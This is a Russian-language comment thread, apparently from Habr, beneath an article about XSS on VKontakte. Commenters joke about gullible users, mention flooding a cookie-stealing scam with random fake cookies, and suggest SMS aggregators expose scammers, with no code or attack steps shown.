Очень захватывающая игра)
Данный пример наглядно показывает, что как ни борись с уязвимостями на стороне сервера, от «дырок» в головах конечных пользователей не убережёшься.
Будут писать в саппорт «Меня взломали и слили все мои голоса, почему вы не боретесь с хакерами, я на вас в суд подам!!!11»
Будут писать в саппорт «Меня взломали и слили все мои голоса, почему вы не боретесь с хакерами, я на вас в суд подам!!!11»
Уязвимости подвержены пользователи версии «ламер». Для устранения уязвимости установите заплатку «напуганный ламер» или дождитесь официального обновления пользователя до версии «продвинутый пользователь».
Спасибо, запустил мусорилку...
Надеюсь 20 потоков рандомно сгенерированных кукисов пригодятся кулхацкерам))
Надеюсь 20 потоков рандомно сгенерированных кукисов пригодятся кулхацкерам))
Кстати, у всех этих приложений, и рпочей мути, рассчитанной на доверчивых юзеров, есть особенность, они часто используют предложения отправить СМС на опр. номер. По идее, можно же отслеживать негодяев, они ведь регистрируются на аггрегаторе, минимум получаем IP а может и номер в вебманях или куда они там деньги выводят, другой вопрос что видимо это никому не интересно?
Как минимум. если им неохота бороться самим, аггрегаторы могли бы раскрывать и публиковать всю информацию введенную при регистрации.
Как минимум. если им неохота бороться самим, аггрегаторы могли бы раскрывать и публиковать всю информацию введенную при регистрации.
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
Даже при закрытых дырах на «Вконтакте» можно устроить XSS